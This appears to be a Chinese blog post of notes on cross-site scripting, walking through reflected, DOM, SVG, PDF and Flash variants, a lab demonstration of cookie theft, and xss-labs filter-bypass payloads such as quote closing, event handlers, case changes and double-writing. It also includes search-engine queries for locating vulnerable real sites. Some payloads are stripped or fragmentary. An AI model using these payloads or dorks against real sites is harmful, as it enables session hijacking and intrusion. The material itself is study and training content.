• XSS跨站脚本攻击


    XSS跨站脚本攻击

    漏洞原理:接受JS代码,输出JS代码解释执行

    网站输出的内容,输入数据能控制。

    黑盒XSS手工分析

    1、页面中显示的数据找可控的(有些隐藏的)
    2、利用可控地方发送JS代码去看执行加载情况
    3、成功执行即XSS,不能成功就看语句输出的地方显示(过滤)
    4、根据显示分析为什么不能执行(实体化,符号括起来,关键字被删除等)

    绕过常用标签

    xss常用标签绕过总结1

    xss常用标签绕过总结2

    反射型(非持续性)

    接受正常的输出,将其更改后执行js代码

    在这里插入图片描述

    执行了js弹窗

    x=
    

    在这里插入图片描述

    标签换成

    x=
    

    在这里插入图片描述

    查看源代码xss语句需要绕过,

    在这里插入图片描述

    如果报错就执行“alert(1)”

    x onerror="alert(1)">
    

    在这里插入图片描述

    查看源代码可以看到,js语句已经拼接成功

    在这里插入图片描述

    嵌套xiaodi8.com

    x=test
    

    在这里插入图片描述

    案例

    可以看到http accept被显示出来,并且是我们可以控制的。

    在这里插入图片描述

    burp抓包添加js语句

    
    

    在这里插入图片描述

    再登录后台,js语句执行成功

    在这里插入图片描述

    查看源代码可以看到js语句

    在这里插入图片描述

    Dom型(非持续性)

    通过修改原始的客户端代码,受害者浏览器的DOM环境改变,导致有效载荷的执行。
    页面本身没有变化,但由于DOM环境被恶意修改,有客户端代码被包含进了页面并执行。

    案例

    Google语法

    edu.cn inurl:url=http
    

    利用就将js语句更改

    url=javascript:alert(1)
    

    在这里插入图片描述

    SVG-xss

    在svg文件中插入js语句

    在这里插入图片描述

    上传svg文件,但是文件不支持,直接复制图片地址

    在这里插入图片描述

    访问弹窗

    在这里插入图片描述

    PDF-xss

    使用pdf编辑器,打开属性,添加动作,选择执行js语句

    app.alert(1)
    

    在这里插入图片描述

    上传pdf到网站

    在这里插入图片描述

    访问网站链接,执行xss

    在这里插入图片描述

    Flash-xss

    使用网站上的本身有的swf文件进行反编译,常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface.call,htmlText,loadMovie等等

    fofa语法

    "phpwind" && icon_hash="-1005349246"
    

    查找到ExternalInterface.call

    在这里插入图片描述

    获取jsobject的变量再用到ExternalInterface.call

    在这里插入图片描述

    uploader.swf?jsobject=alert(1)
    

    因为配置问题访问swf文件直接下载,就复现不了。

    cookie盗取
    小皮面板

    谷歌浏览器充当攻击者,edge浏览器充当管理员

    搭建xss平台,配置好获取cookie的js

    在这里插入图片描述

    生成payload

    在这里插入图片描述

    将js语句插入到有xss漏洞中

    在这里插入图片描述

    当管理员登录到后台后会获取到cookie

    在这里插入图片描述

    复制cookie信息到cookie插件中保存

    在这里插入图片描述

    访问后台地址http://192.168.100.102:9080/10F34D#/home/logs/成功访问到后台

    在这里插入图片描述

    xss靶场

    绕过

    第一关

    在这里插入图片描述

    在这里插入图片描述

    第二关

    直接输入js语句无法执行,F12打开对应位置,看到有引号

    在这里插入图片描述

    直接引号闭合

    ">
    

    在这里插入图片描述

    第三关

    实体化标签

    在这里插入图片描述

    使用标签事件绕过

    ' onfocus=javascript:alert() '
    

    在这里插入图片描述

    第四关

    在这里插入图片描述

    ”onfocus=javascript:alert()
    

    在这里插入图片描述

    第五关

    on被过滤利用其它标签绕过

    在这里插入图片描述

    "> xxx <"
    

    在这里插入图片描述

    第六关
    
    

    script被过滤

    在这里插入图片描述

    大小写绕过

    "><"
    

    在这里插入图片描述

    第七关

    过滤了script

    
    

    在这里插入图片描述

    双写绕过

    ">alert(1)<"
    

    在这里插入图片描述

    第八关

    在这里插入图片描述

    过滤script,大小写双写都不能绕过

    在这里插入图片描述

    unicode编码

    javascript:alert(1)
    javascript:alert(1)
    

    在这里插入图片描述

    在这里插入图片描述

    第九关

    在这里插入图片描述

    需要字符串中带有http://

    在这里插入图片描述

    unicode编码

    javascript:alert(1)
    javascript:alert(1)
    

    在这里插入图片描述

    拼接上http://

    javascript:alert(1)('http://')
    

    在这里插入图片描述

    第十关

    隐藏属性触发闭合

    在这里插入图片描述

    修改标签鼠标点击触发js语句

    ?t_sort=" onfocus=javascript:alert() type="text
    

    在这里插入图片描述

    XSS工具

    项目地址

    python xsstrike.py -u "http://192.168.100.2:1002/level11.php"
    

    在这里插入图片描述

    复制payload成功绕过

    在这里插入图片描述

  • 相关阅读:
    好客租房120-在脚手架中使用sass
    深入理解java虚拟机:虚拟机类加载机制(2)
    【数据结构与算法分析】0基础带你学数据结构与算法分析09--线索二叉树 (TBT)
    栈的OJ题(逆波兰表达式求值+括号匹配+出入栈顺序匹配+最小栈)
    windows下的docker和Kubernetes安装
    驱动开发:内核中进程与句柄互转
    『现学现忘』Git基础 — 11、配置Git用户签名的方式
    【广州华锐互动】VR影视制片虚拟仿真教学系统
    Python函数
    SQL Server 2014主从数据库订阅和发布(SQLserver复制)超详细
  • 原文地址:https://blog.csdn.net/qq_49288916/article/details/139776204